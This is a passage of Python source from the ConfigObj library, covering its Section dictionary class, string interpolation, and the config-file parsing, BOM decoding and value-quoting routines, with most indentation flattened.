# Anything else: ignore completely, just return it unchanged
return None, match.group(), None
interpolation_engines = {
'configparser': ConfigParserInterpolation,
'template': TemplateInterpolation,
}
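# Illustrative example of the two interpolation styles registered above
# (doctest-style; ConfigObj is defined further down in this module):
#
#     >>> cfg = ConfigObj(['home = /usr/local', 'bin = %(home)s/bin'])
#     >>> cfg['bin']
#     '/usr/local/bin'
#     >>> cfg = ConfigObj(['home = /usr/local', 'bin = $home/bin'],
#     ...                 interpolation='template')
#     >>> cfg['bin']
#     '/usr/local/bin'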
def __newobj__(cls, *args):
# Hack for pickle
return cls.__new__(cls, *args)
class Section(dict):
"""
A dictionary-like object that represents a section in a config file.
It does string interpolation if the 'interpolation' attribute
of the 'main' object is set to True.
Interpolation is tried first from this object, then from the 'DEFAULT'
section of this object, next from the parent and its 'DEFAULT' section,
and so on until the main object is reached.
A Section will behave like an ordered dictionary - following the
order of the ``scalars`` and ``sections`` attributes.
You can use this to change the order of members.
Iteration follows the order: scalars, then sections.
"""
def __setstate__(self, state):
dict.update(self, state[0])
self.__dict__.update(state[1])
def __reduce__(self):
state = (dict(self), self.__dict__)
return (__newobj__, (self.__class__,), state)
def __init__(self, parent, depth, main, indict=None, name=None):
"""
* parent is the section above
* depth is the depth level of this section
* main is the main ConfigObj
* indict is a dictionary to initialise the section with
"""
if indict is None:
indict = {}
dict.__init__(self)
# used for nesting level *and* interpolation
self.parent = parent
# used for the interpolation attribute
self.main = main
# level of nesting depth of this Section
self.depth = depth
# purely for information
self.name = name
#
self._initialise()
# we do this explicitly so that __setitem__ is used properly
# (rather than just passing to ``dict.__init__``)
for entry, value in indict.items():
self[entry] = value
def _initialise(self):
# the sequence of scalar values in this Section
self.scalars = []
# the sequence of sections in this Section
self.sections = []
# for comments :-)
self.comments = {}
self.inline_comments = {}
# the configspec
self.configspec = None
# for defaults
self.defaults = []
self.default_values = {}
self.extra_values = []
self._created = False
def _interpolate(self, key, value):
try:
# do we already have an interpolation engine?
engine = self._interpolation_engine
except AttributeError:
# not yet: first time running _interpolate(), so pick the engine
name = self.main.interpolation
if name == True: # note that "if name:" would be incorrect here
# backwards-compatibility: interpolation=True means use default
name = DEFAULT_INTERPOLATION
name = name.lower() # so that "Template", "template", etc. all work
class_ = interpolation_engines.get(name, None)
if class_ is None:
# invalid value for self.main.interpolation
self.main.interpolation = False
return value
else:
# save reference to engine so we don't have to do this again
engine = self._interpolation_engine = class_(self)
# let the engine do the actual work
return engine.interpolate(key, value)
def __getitem__(self, key):
"""Fetch the item and do string interpolation."""
val = dict.__getitem__(self, key)
if self.main.interpolation:
if isinstance(val, six.string_types):
return self._interpolate(key, val)
if isinstance(val, list):
def _check(entry):
if isinstance(entry, six.string_types):
return self._interpolate(key, entry)
return entry
new = [_check(entry) for entry in val]
if new != val:
return new
return val
def __setitem__(self, key, value, unrepr=False):
"""
Correctly set a value.
Making dictionary values Section instances.
(We have to special case 'Section' instances - which are also dicts)
Keys must be strings.
Values need only be strings (or lists of strings) if
``main.stringify`` is set.
``unrepr`` must be set when setting a value to a dictionary, without
creating a new sub-section.
"""
if not isinstance(key, six.string_types):
raise ValueError('The key "%s" is not a string.' % key)
# add the comment
if key not in self.comments:
self.comments[key] = []
self.inline_comments[key] = ''
# remove the entry from defaults
if key in self.defaults:
self.defaults.remove(key)
#
if isinstance(value, Section):
if key not in self:
self.sections.append(key)
dict.__setitem__(self, key, value)
elif isinstance(value, dict) and not unrepr:
# First create the new depth level,
# then create the section
if key not in self:
self.sections.append(key)
new_depth = self.depth + 1
dict.__setitem__(
self,
key,
Section(
self,
new_depth,
self.main,
indict=value,
name=key))
else:
if key not in self:
self.scalars.append(key)
if not self.main.stringify:
if isinstance(value, six.string_types):
pass
elif isinstance(value, (list, tuple)):
for entry in value:
if not isinstance(entry, six.string_types):
raise TypeError('Value is not a string "%s".' % entry)
else:
raise TypeError('Value is not a string "%s".' % value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
"""Remove items from the sequence when deleting."""
        dict.__delitem__(self, key)
if key in self.scalars:
self.scalars.remove(key)
else:
self.sections.remove(key)
del self.comments[key]
del self.inline_comments[key]
def get(self, key, default=None):
"""A version of ``get`` that doesn't bypass string interpolation."""
try:
return self[key]
except KeyError:
return default
def update(self, indict):
"""
A version of update that uses our ``__setitem__``.
"""
for entry in indict:
self[entry] = indict[entry]
def pop(self, key, default=MISSING):
"""
'D.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised'
"""
try:
val = self[key]
except KeyError:
if default is MISSING:
raise
val = default
else:
del self[key]
return val
def popitem(self):
"""Pops the first (key,val)"""
sequence = (self.scalars + self.sections)
if not sequence:
raise KeyError(": 'popitem(): dictionary is empty'")
key = sequence[0]
val = self[key]
del self[key]
return key, val
def clear(self):
"""
A version of clear that also affects scalars/sections
Also clears comments and configspec.
Leaves other attributes alone :
depth/main/parent are not affected
"""
dict.clear(self)
self.scalars = []
self.sections = []
self.comments = {}
self.inline_comments = {}
self.configspec = None
self.defaults = []
self.extra_values = []
def setdefault(self, key, default=None):
"""A version of setdefault that sets sequence if appropriate."""
try:
return self[key]
except KeyError:
self[key] = default
return self[key]
def items(self):
"""D.items() -> list of D's (key, value) pairs, as 2-tuples"""
return list(zip((self.scalars + self.sections), list(self.values())))
def keys(self):
"""D.keys() -> list of D's keys"""
return (self.scalars + self.sections)
def values(self):
"""D.values() -> list of D's values"""
return [self[key] for key in (self.scalars + self.sections)]
def iteritems(self):
"""D.iteritems() -> an iterator over the (key, value) items of D"""
return iter(list(self.items()))
def iterkeys(self):
"""D.iterkeys() -> an iterator over the keys of D"""
return iter((self.scalars + self.sections))
__iter__ = iterkeys
def itervalues(self):
"""D.itervalues() -> an iterator over the values of D"""
return iter(list(self.values()))
def __repr__(self):
"""x.__repr__() <==> repr(x)"""
def _getval(key):
try:
return self[key]
except MissingInterpolationOption:
return dict.__getitem__(self, key)
return '{%s}' % ', '.join([('%s: %s' % (repr(key), repr(_getval(key))))
for key in (self.scalars + self.sections)])
__str__ = __repr__
__str__.__doc__ = "x.__str__() <==> str(x)"
# Extra methods - not in a normal dictionary
def dict(self):
"""
Return a deepcopy of self as a dictionary.
All members that are ``Section`` instances are recursively turned to
ordinary dictionaries - by calling their ``dict`` method.
>>> n = a.dict()
>>> n == a
1
>>> n is a
0
"""
newdict = {}
for entry in self:
this_entry = self[entry]
if isinstance(this_entry, Section):
this_entry = this_entry.dict()
elif isinstance(this_entry, list):
# create a copy rather than a reference
this_entry = list(this_entry)
elif isinstance(this_entry, tuple):
# create a copy rather than a reference
this_entry = tuple(this_entry)
newdict[entry] = this_entry
return newdict
def merge(self, indict):
"""
A recursive update - useful for merging config files.
>>> a = '''[section1]
... option1 = True
... [[subsection]]
... more_options = False
... # end of file'''.splitlines()
>>> b = '''# File is user.ini
... [section1]
... option1 = False
... # end of file'''.splitlines()
>>> c1 = ConfigObj(b)
>>> c2 = ConfigObj(a)
>>> c2.merge(c1)
>>> c2
ConfigObj({'section1': {'option1': 'False', 'subsection': {'more_options': 'False'}}})
"""
for key, val in list(indict.items()):
if (key in self and isinstance(self[key], dict) and
isinstance(val, dict)):
self[key].merge(val)
else:
self[key] = val
def rename(self, oldkey, newkey):
"""
Change a keyname to another, without changing position in sequence.
Implemented so that transformations can be made on keys,
as well as on values. (used by encode and decode)
Also renames comments.
"""
if oldkey in self.scalars:
the_list = self.scalars
elif oldkey in self.sections:
the_list = self.sections
else:
raise KeyError('Key "%s" not found.' % oldkey)
pos = the_list.index(oldkey)
#
val = self[oldkey]
dict.__delitem__(self, oldkey)
dict.__setitem__(self, newkey, val)
the_list.remove(oldkey)
the_list.insert(pos, newkey)
comm = self.comments[oldkey]
inline_comment = self.inline_comments[oldkey]
del self.comments[oldkey]
del self.inline_comments[oldkey]
self.comments[newkey] = comm
self.inline_comments[newkey] = inline_comment
def walk(self, function, raise_errors=True,
call_on_sections=False, **keywargs):
"""
Walk every member and call a function on the keyword and value.
Return a dictionary of the return values
        If the function raises an exception, raise the error
unless ``raise_errors=False``, in which case set the return value to
``False``.
        Any unrecognised keyword arguments you pass to walk will be passed on
to the function you pass in.
Note: if ``call_on_sections`` is ``True`` then - on encountering a
subsection, *first* the function is called for the *whole* subsection,
        and then recurses into its members. This means your function must be
able to handle strings, dictionaries and lists. This allows you
to change the key of subsections as well as for ordinary members. The
return value when called on the whole subsection has to be discarded.
See the encode and decode methods for examples, including functions.
.. admonition:: caution
You can use ``walk`` to transform the names of members of a section
but you mustn't add or delete members.
>>> config = '''[XXXXsection]
... XXXXkey = XXXXvalue'''.splitlines()
>>> cfg = ConfigObj(config)
>>> cfg
ConfigObj({'XXXXsection': {'XXXXkey': 'XXXXvalue'}})
>>> def transform(section, key):
... val = section[key]
... newkey = key.replace('XXXX', 'CLIENT1')
... section.rename(key, newkey)
... if isinstance(val, (tuple, list, dict)):
... pass
... else:
... val = val.replace('XXXX', 'CLIENT1')
... section[newkey] = val
>>> cfg.walk(transform, call_on_sections=True)
{'CLIENT1section': {'CLIENT1key': None}}
>>> cfg
ConfigObj({'CLIENT1section': {'CLIENT1key': 'CLIENT1value'}})
"""
out = {}
# scalars first
for i in range(len(self.scalars)):
entry = self.scalars[i]
try:
val = function(self, entry, **keywargs)
# bound again in case name has changed
entry = self.scalars[i]
out[entry] = val
except Exception:
if raise_errors:
raise
else:
entry = self.scalars[i]
out[entry] = False
# then sections
for i in range(len(self.sections)):
entry = self.sections[i]
if call_on_sections:
try:
function(self, entry, **keywargs)
except Exception:
if raise_errors:
raise
else:
entry = self.sections[i]
out[entry] = False
# bound again in case name has changed
entry = self.sections[i]
# previous result is discarded
out[entry] = self[entry].walk(
function,
raise_errors=raise_errors,
call_on_sections=call_on_sections,
**keywargs)
return out
def as_bool(self, key):
"""
Accepts a key as input. The corresponding value must be a string or
the objects (``True`` or 1) or (``False`` or 0). We allow 0 and 1 to
retain compatibility with Python 2.2.
If the string is one of ``True``, ``On``, ``Yes``, or ``1`` it returns
``True``.
If the string is one of ``False``, ``Off``, ``No``, or ``0`` it returns
``False``.
``as_bool`` is not case sensitive.
Any other input will raise a ``ValueError``.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_bool('a')
Traceback (most recent call last):
ValueError: Value "fish" is neither True nor False
>>> a['b'] = 'True'
>>> a.as_bool('b')
1
>>> a['b'] = 'off'
>>> a.as_bool('b')
0
"""
val = self[key]
if val == True:
return True
elif val == False:
return False
else:
try:
if not isinstance(val, six.string_types):
# TODO: Why do we raise a KeyError here?
raise KeyError()
else:
return self.main._bools[val.lower()]
except KeyError:
raise ValueError('Value "%s" is neither True nor False' % val)
def as_int(self, key):
"""
A convenience method which coerces the specified value to an integer.
If the value is an invalid literal for ``int``, a ``ValueError`` will
be raised.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_int('a')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: 'fish'
>>> a['b'] = '1'
>>> a.as_int('b')
1
>>> a['b'] = '3.2'
>>> a.as_int('b')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: '3.2'
"""
return int(self[key])
def as_float(self, key):
"""
A convenience method which coerces the specified value to a float.
If the value is an invalid literal for ``float``, a ``ValueError`` will
be raised.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_float('a') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ValueError: invalid literal for float(): fish
>>> a['b'] = '1'
>>> a.as_float('b')
1.0
>>> a['b'] = '3.2'
>>> a.as_float('b') #doctest: +ELLIPSIS
3.2...
"""
return float(self[key])
def as_list(self, key):
"""
A convenience method which fetches the specified value, guaranteeing
that it is a list.
>>> a = ConfigObj()
>>> a['a'] = 1
>>> a.as_list('a')
[1]
>>> a['a'] = (1,)
>>> a.as_list('a')
[1]
>>> a['a'] = [1]
>>> a.as_list('a')
[1]
"""
result = self[key]
if isinstance(result, (tuple, list)):
return list(result)
return [result]
def restore_default(self, key):
"""
Restore (and return) default value for the specified key.
This method will only work for a ConfigObj that was created
with a configspec and has been validated.
If there is no default value for this key, ``KeyError`` is raised.
"""
default = self.default_values[key]
dict.__setitem__(self, key, default)
if key not in self.defaults:
self.defaults.append(key)
return default
def restore_defaults(self):
"""
Recursively restore default values to all members
that have them.
This method will only work for a ConfigObj that was created
with a configspec and has been validated.
It doesn't delete or modify entries without default values.
"""
for key in self.default_values:
self.restore_default(key)
for section in self.sections:
self[section].restore_defaults()
class ConfigObj(Section):
"""An object to read, create, and write config files."""
_keyword = re.compile(r'''^ # line start
(\s*) # indentation
( # keyword
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'"=].*?) # no quotes
)
\s*=\s* # divider
(.*) # value (including list values and comments)
$ # line end
''',
re.VERBOSE)
_sectionmarker = re.compile(r'''^
(\s*) # 1: indentation
((?:\[\s*)+) # 2: section marker open
( # 3: section name open
(?:"\s*\S.*?\s*")| # at least one non-space with double quotes
(?:'\s*\S.*?\s*')| # at least one non-space with single quotes
(?:[^'"\s].*?) # at least one non-space unquoted
) # section name close
((?:\s*\])+) # 4: section marker close
\s*(\#.*)? # 5: optional comment
$''',
re.VERBOSE)
# this regexp pulls list values out as a single string
# or single values and comments
# FIXME: this regex adds a '' to the end of comma terminated lists
# workaround in ``_handle_value``
_valueexp = re.compile(r'''^
(?:
(?:
(
(?:
(?:
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#][^,\#]*?) # unquoted
)
\s*,\s* # comma
)* # match all list items ending in a comma (if any)
)
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#\s][^,]*?)| # unquoted
(?:(?<!,)) # Empty value
)? # last item in a list - or string value
)|
(,) # alternatively a single comma - empty list
)
\s*(\#.*)? # optional comment
$''',
re.VERBOSE)
# use findall to get the members of a list value
_listvalueexp = re.compile(r'''
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#]?.*?) # unquoted
)
\s*,\s* # comma
''',
re.VERBOSE)
# this regexp is used for the value
# when lists are switched off
_nolistvalue = re.compile(r'''^
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'"\#].*?)| # unquoted
(?:) # Empty value
)
\s*(\#.*)? # optional comment
$''',
re.VERBOSE)
# regexes for finding triple quoted values on one line
_single_line_single = re.compile(r"^'''(.*?)'''\s*(#.*)?$")
_single_line_double = re.compile(r'^"""(.*?)"""\s*(#.*)?$')
_multi_line_single = re.compile(r"^(.*?)'''\s*(#.*)?$")
_multi_line_double = re.compile(r'^(.*?)"""\s*(#.*)?$')
_triple_quote = {
"'''": (_single_line_single, _multi_line_single),
'"""': (_single_line_double, _multi_line_double),
}
# Used by the ``istrue`` Section method
_bools = {
'yes': True, 'no': False,
'on': True, 'off': False,
'1': True, '0': False,
'true': True, 'false': False,
}
def __init__(self, infile=None, options=None, configspec=None, encoding=None,
interpolation=True, raise_errors=False, list_values=True,
create_empty=False, file_error=False, stringify=True,
indent_type=None, default_encoding=None, unrepr=False,
write_empty_values=False, _inspec=False):
"""
Parse a config file or create a config file object.
``ConfigObj(infile=None, configspec=None, encoding=None,
interpolation=True, raise_errors=False, list_values=True,
create_empty=False, file_error=False, stringify=True,
indent_type=None, default_encoding=None, unrepr=False,
write_empty_values=False, _inspec=False)``
"""
self._inspec = _inspec
# init the superclass
Section.__init__(self, self, 0, self)
infile = infile or []
_options = {'configspec': configspec,
'encoding': encoding, 'interpolation': interpolation,
'raise_errors': raise_errors, 'list_values': list_values,
'create_empty': create_empty, 'file_error': file_error,
'stringify': stringify, 'indent_type': indent_type,
'default_encoding': default_encoding, 'unrepr': unrepr,
'write_empty_values': write_empty_values}
if options is None:
options = _options
else:
import warnings
warnings.warn('Passing in an options dictionary to ConfigObj() is '
'deprecated. Use **options instead.',
DeprecationWarning, stacklevel=2)
# TODO: check the values too.
for entry in options:
if entry not in OPTION_DEFAULTS:
raise TypeError('Unrecognised option "%s".' % entry)
for entry, value in list(OPTION_DEFAULTS.items()):
if entry not in options:
options[entry] = value
keyword_value = _options[entry]
if value != keyword_value:
options[entry] = keyword_value
# XXXX this ignores an explicit list_values = True in combination
# with _inspec. The user should *never* do that anyway, but still...
if _inspec:
options['list_values'] = False
self._initialise(options)
configspec = options['configspec']
self._original_configspec = configspec
self._load(infile, configspec)
def _load(self, infile, configspec):
if isinstance(infile, six.string_types):
self.filename = infile
if os.path.isfile(infile):
with open(infile, 'rb') as h:
content = h.readlines() or []
elif self.file_error:
# raise an error if the file doesn't exist
raise IOError('Config file not found: "%s".' % self.filename)
else:
# file doesn't already exist
if self.create_empty:
# this is a good test that the filename specified
# isn't impossible - like on a non-existent device
with open(infile, 'w') as h:
h.write('')
content = []
elif isinstance(infile, (list, tuple)):
content = list(infile)
elif isinstance(infile, dict):
# initialise self
# the Section class handles creating subsections
if isinstance(infile, ConfigObj):
# get a copy of our ConfigObj
def set_section(in_section, this_section):
for entry in in_section.scalars:
this_section[entry] = in_section[entry]
for section in in_section.sections:
this_section[section] = {}
set_section(in_section[section], this_section[section])
set_section(infile, self)
else:
for entry in infile:
self[entry] = infile[entry]
del self._errors
if configspec is not None:
self._handle_configspec(configspec)
else:
self.configspec = None
return
elif getattr(infile, 'read', MISSING) is not MISSING:
# This supports file like objects
content = infile.read() or []
# needs splitting into lines - but needs doing *after* decoding
# in case it's not an 8 bit encoding
else:
raise TypeError('infile must be a filename, file like object, or list of lines.')
if content:
# don't do it for the empty ConfigObj
content = self._handle_bom(content)
# infile is now *always* a list
#
# Set the newlines attribute (first line ending it finds)
# and strip trailing '\n' or '\r' from lines
for line in content:
if (not line) or (line[-1] not in ('\r', '\n')):
continue
for end in ('\r\n', '\n', '\r'):
if line.endswith(end):
self.newlines = end
break
break
assert all(isinstance(line, six.string_types) for line in content), repr(content)
content = [line.rstrip('\r\n') for line in content]
self._parse(content)
# if we had any errors, now is the time to raise them
if self._errors:
info = "at line %s." % self._errors[0].line_number
if len(self._errors) > 1:
msg = "Parsing failed with several errors.\nFirst error %s" % info
error = ConfigObjError(msg)
else:
error = self._errors[0]
# set the errors attribute; it's a list of tuples:
# (error_type, message, line_number)
error.errors = self._errors
# set the config attribute
error.config = self
raise error
# delete private attributes
del self._errors
if configspec is None:
self.configspec = None
else:
self._handle_configspec(configspec)
def _initialise(self, options=None):
if options is None:
options = OPTION_DEFAULTS
# initialise a few variables
self.filename = None
self._errors = []
self.raise_errors = options['raise_errors']
self.interpolation = options['interpolation']
self.list_values = options['list_values']
self.create_empty = options['create_empty']
self.file_error = options['file_error']
self.stringify = options['stringify']
self.indent_type = options['indent_type']
self.encoding = options['encoding']
self.default_encoding = options['default_encoding']
self.BOM = False
self.newlines = None
self.write_empty_values = options['write_empty_values']
self.unrepr = options['unrepr']
self.initial_comment = []
self.final_comment = []
self.configspec = None
if self._inspec:
self.list_values = False
# Clear section attributes as well
Section._initialise(self)
def __repr__(self):
def _getval(key):
try:
return self[key]
except MissingInterpolationOption:
return dict.__getitem__(self, key)
return ('ConfigObj({%s})' %
', '.join([('%s: %s' % (repr(key), repr(_getval(key))))
for key in (self.scalars + self.sections)]))
def _handle_bom(self, infile):
"""
Handle any BOM, and decode if necessary.
If an encoding is specified, that *must* be used - but the BOM should
still be removed (and the BOM attribute set).
(If the encoding is wrongly specified, then a BOM for an alternative
encoding won't be discovered or removed.)
If an encoding is not specified, UTF8 or UTF16 BOM will be detected and
removed. The BOM attribute will be set. UTF16 will be decoded to
unicode.
NOTE: This method must not be called with an empty ``infile``.
Specifying the *wrong* encoding is likely to cause a
``UnicodeDecodeError``.
``infile`` must always be returned as a list of lines, but may be
passed in as a single string.
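        Illustrative sketch (UTF-8 BOM present, no encoding specified)::
            config._handle_bom([BOM_UTF8 + 'first line\\n'])
            # -> ['first line\\n'], with ``config.BOM`` now ``True``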
"""
if ((self.encoding is not None) and
(self.encoding.lower() not in BOM_LIST)):
# No need to check for a BOM
# the encoding specified doesn't have one
# just decode
return self._decode(infile, self.encoding)
if isinstance(infile, (list, tuple)):
line = infile[0]
else:
line = infile
if isinstance(line, six.text_type):
# it's already decoded and there's no need to do anything
# else, just use the _decode utility method to handle
# listifying appropriately
return self._decode(infile, self.encoding)
if self.encoding is not None:
# encoding explicitly supplied
# And it could have an associated BOM
# TODO: if encoding is just UTF16 - we ought to check for both
# TODO: big endian and little endian versions.
enc = BOM_LIST[self.encoding.lower()]
if enc == 'utf_16':
# For UTF16 we try big endian and little endian
for BOM, (encoding, final_encoding) in list(BOMS.items()):
if not final_encoding:
# skip UTF8
continue
if infile.startswith(BOM):
### BOM discovered
##self.BOM = True
# Don't need to remove BOM
return self._decode(infile, encoding)
# If we get this far, will *probably* raise a DecodeError
# As it doesn't appear to start with a BOM
return self._decode(infile, self.encoding)
# Must be UTF8
BOM = BOM_SET[enc]
if not line.startswith(BOM):
return self._decode(infile, self.encoding)
newline = line[len(BOM):]
# BOM removed
if isinstance(infile, (list, tuple)):
infile[0] = newline
else:
infile = newline
self.BOM = True
return self._decode(infile, self.encoding)
# No encoding specified - so we need to check for UTF8/UTF16
for BOM, (encoding, final_encoding) in list(BOMS.items()):
if not isinstance(line, six.binary_type) or not line.startswith(BOM):
# didn't specify a BOM, or it's not a bytestring
continue
else:
# BOM discovered
self.encoding = final_encoding
if not final_encoding:
self.BOM = True
# UTF8
# remove BOM
newline = line[len(BOM):]
if isinstance(infile, (list, tuple)):
infile[0] = newline
else:
infile = newline
# UTF-8
if isinstance(infile, six.text_type):
return infile.splitlines(True)
elif isinstance(infile, six.binary_type):
return infile.decode('utf-8').splitlines(True)
else:
return self._decode(infile, 'utf-8')
# UTF16 - have to decode
return self._decode(infile, encoding)
if six.PY2 and isinstance(line, str):
# don't actually do any decoding, since we're on python 2 and
# returning a bytestring is fine
return self._decode(infile, None)
# No BOM discovered and no encoding specified, default to UTF-8
if isinstance(infile, six.binary_type):
return infile.decode('utf-8').splitlines(True)
else:
return self._decode(infile, 'utf-8')
def _a_to_u(self, aString):
"""Decode ASCII strings to unicode if a self.encoding is specified."""
if isinstance(aString, six.binary_type) and self.encoding:
return aString.decode(self.encoding)
else:
return aString
def _decode(self, infile, encoding):
"""
        Decode infile to unicode, using the specified encoding.
        If it is a string, it also needs converting to a list.
"""
if isinstance(infile, six.string_types):
return infile.splitlines(True)
if isinstance(infile, six.binary_type):
# NOTE: Could raise a ``UnicodeDecodeError``
if encoding:
return infile.decode(encoding).splitlines(True)
else:
return infile.splitlines(True)
if encoding:
for i, line in enumerate(infile):
if isinstance(line, six.binary_type):
# NOTE: The isinstance test here handles mixed lists of unicode/string
# NOTE: But the decode will break on any non-string values
# NOTE: Or could raise a ``UnicodeDecodeError``
infile[i] = line.decode(encoding)
return infile
def _decode_element(self, line):
"""Decode element to unicode if necessary."""
if isinstance(line, six.binary_type) and self.default_encoding:
return line.decode(self.default_encoding)
else:
return line
# TODO: this may need to be modified
def _str(self, value):
"""
Used by ``stringify`` within validate, to turn non-string values
into strings.
"""
if not isinstance(value, six.string_types):
            # intentionally 'str' because it's just whatever the "normal"
            # string type is for the python version we're dealing with
return str(value)
else:
return value
def _parse(self, infile):
"""Actually parse the config file."""
temp_list_values = self.list_values
if self.unrepr:
self.list_values = False
comment_list = []
done_start = False
this_section = self
maxline = len(infile) - 1
cur_index = -1
reset_comment = False
while cur_index < maxline:
if reset_comment:
comment_list = []
cur_index += 1
line = infile[cur_index]
sline = line.strip()
# do we have anything on the line ?
if not sline or sline.startswith('#'):
reset_comment = False
comment_list.append(line)
continue
if not done_start:
# preserve initial comment
self.initial_comment = comment_list
comment_list = []
done_start = True
reset_comment = True
# first we check if it's a section marker
mat = self._sectionmarker.match(line)
if mat is not None:
# is a section line
(indent, sect_open, sect_name, sect_close, comment) = mat.groups()
if indent and (self.indent_type is None):
self.indent_type = indent
cur_depth = sect_open.count('[')
if cur_depth != sect_close.count(']'):
self._handle_error("Cannot compute the section depth",
NestingError, infile, cur_index)
continue
if cur_depth < this_section.depth:
# the new section is dropping back to a previous level
try:
parent = self._match_depth(this_section,
cur_depth).parent
except SyntaxError:
self._handle_error("Cannot compute nesting level",
NestingError, infile, cur_index)
continue
elif cur_depth == this_section.depth:
# the new section is a sibling of the current section
parent = this_section.parent
elif cur_depth == this_section.depth + 1:
                    # the new section is a child of the current section
parent = this_section
else:
self._handle_error("Section too nested",
NestingError, infile, cur_index)
continue
sect_name = self._unquote(sect_name)
if sect_name in parent:
self._handle_error('Duplicate section name',
DuplicateError, infile, cur_index)
continue
# create the new section
this_section = Section(
parent,
cur_depth,
self,
name=sect_name)
parent[sect_name] = this_section
parent.inline_comments[sect_name] = comment
parent.comments[sect_name] = comment_list
continue
#
# it's not a section marker,
# so it should be a valid ``key = value`` line
mat = self._keyword.match(line)
if mat is None:
self._handle_error(
'Invalid line ({0!r}) (matched as neither section nor keyword)'.format(line),
ParseError, infile, cur_index)
else:
# is a keyword value
# value will include any inline comment
(indent, key, value) = mat.groups()
if indent and (self.indent_type is None):
self.indent_type = indent
# check for a multiline value
if value[:3] in ['"""', "'''"]:
try:
value, comment, cur_index = self._multiline(
value, infile, cur_index, maxline)
except SyntaxError:
self._handle_error(
'Parse error in multiline value',
ParseError, infile, cur_index)
continue
else:
if self.unrepr:
comment = ''
try:
value = unrepr(value)
except Exception as e:
if type(e) == UnknownType:
msg = 'Unknown name or type in value'
else:
msg = 'Parse error from unrepr-ing multiline value'
self._handle_error(msg, UnreprError, infile,
cur_index)
continue
else:
if self.unrepr:
comment = ''
try:
value = unrepr(value)
except Exception as e:
if isinstance(e, UnknownType):
msg = 'Unknown name or type in value'
else:
msg = 'Parse error from unrepr-ing value'
self._handle_error(msg, UnreprError, infile,
cur_index)
continue
else:
# extract comment and lists
try:
(value, comment) = self._handle_value(value)
except SyntaxError:
self._handle_error(
'Parse error in value',
ParseError, infile, cur_index)
continue
#
key = self._unquote(key)
if key in this_section:
self._handle_error(
'Duplicate keyword name',
DuplicateError, infile, cur_index)
continue
# add the key.
# we set unrepr because if we have got this far we will never
# be creating a new section
this_section.__setitem__(key, value, unrepr=True)
this_section.inline_comments[key] = comment
this_section.comments[key] = comment_list
continue
#
if self.indent_type is None:
# no indentation used, set the type accordingly
self.indent_type = ''
# preserve the final comment
if not self and not self.initial_comment:
self.initial_comment = comment_list
elif not reset_comment:
self.final_comment = comment_list
self.list_values = temp_list_values
def _match_depth(self, sect, depth):
"""
        Given a section and a depth level, walk back through the section's
        parents to see if the depth level matches a previous section.
Return a reference to the right section,
or raise a SyntaxError.
"""
while depth < sect.depth:
if sect is sect.parent:
# we've reached the top level already
raise SyntaxError()
sect = sect.parent
if sect.depth == depth:
return sect
# shouldn't get here
raise SyntaxError()
def _handle_error(self, text, ErrorClass, infile, cur_index):
"""
Handle an error according to the error settings.
Either raise the error or store it.
        The error will have occurred at ``cur_index``.
"""
line = infile[cur_index]
cur_index += 1
message = '{0} at line {1}.'.format(text, cur_index)
error = ErrorClass(message, cur_index, line)
if self.raise_errors:
# raise the error - parsing stops here
raise error
# store the error
# reraise when parsing has finished
self._errors.append(error)
def _unquote(self, value):
"""Return an unquoted version of a value"""
if not value:
# should only happen during parsing of lists
raise SyntaxError
if (value[0] == value[-1]) and (value[0] in ('"', "'")):
value = value[1:-1]
return value
def _quote(self, value, multiline=True):
"""
Return a safely quoted version of a value.
Raise a ConfigObjError if the value cannot be safely quoted.
If multiline is ``True`` (default) then use triple quotes
if necessary.
* Don't quote values that don't need it.
* Recursively quote members of a list and return a comma joined list.
* Multiline is ``False`` for lists.
* Obey list syntax for empty and single member lists.
If ``list_values=False`` then the value is only quoted if it contains
a ``\\n`` (is multiline) or '#'.
If ``write_empty_values`` is set, and the value is an empty string, it
won't be quoted.
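        Illustrative sketch of the resulting behaviour (default options)::
            config._quote('plain')        # -> 'plain' (no quoting needed)
            config._quote('has, comma')   # -> '"has, comma"'
            config._quote(['a', 'b'])     # -> 'a, b'
            config._quote([])             # -> ','  (empty list syntax)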
"""
if multiline and self.write_empty_values and value == '':
# Only if multiline is set, so that it is used for values not
# keys, and not values that are part of a list
return ''
if multiline and isinstance(value, (list, tuple)):
if not value:
return ','
elif len(value) == 1:
return self._quote(value[0], multiline=False) + ','
return ', '.join([self._quote(val, multiline=False)
for val in value])
if not isinstance(value, six.string_types):
if self.stringify:
                # intentionally 'str' because it's just whatever the "normal"
                # string type is for the python version we're dealing with
value = str(value)
else:
raise TypeError('Value "%s" is not a string.' % value)
if not value:
return '""'
no_lists_no_quotes = not self.list_values and '\n' not in value and '#' not in value
need_triple = multiline and ((("'" in value) and ('"' in value)) or ('\n' in value ))
hash_triple_quote = multiline and not need_triple and ("'" in value) and ('"' in value) and ('#' in value)
check_for_single = (no_lists_no_quotes or not need_triple) and not hash_triple_quote
if check_for_single:
if not self.list_values:
# we don't quote if ``list_values=False``
quot = noquot
# for normal values either single or double quotes will do
elif '\n' in value:
# will only happen if multiline is off - e.g. '\n' in key
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
elif ((value[0] not in wspace_plus) and
(value[-1] not in wspace_plus) and
(',' not in value)):
quot = noquot
else:
quot = self._get_single_quote(value)
else:
# if value has '\n' or "'" *and* '"', it will need triple quotes
quot = self._get_triple_quote(value)
if quot == noquot and '#' in value and self.list_values:
quot = self._get_single_quote(value)
return quot % value
def _get_single_quote(self, value):
if ("'" in value) and ('"' in value):
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
elif '"' in value:
quot = squot
else:
quot = dquot
return quot
def _get_triple_quote(self, value):
if (value.find('"""') != -1) and (value.find("'''") != -1):
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
if value.find('"""') == -1:
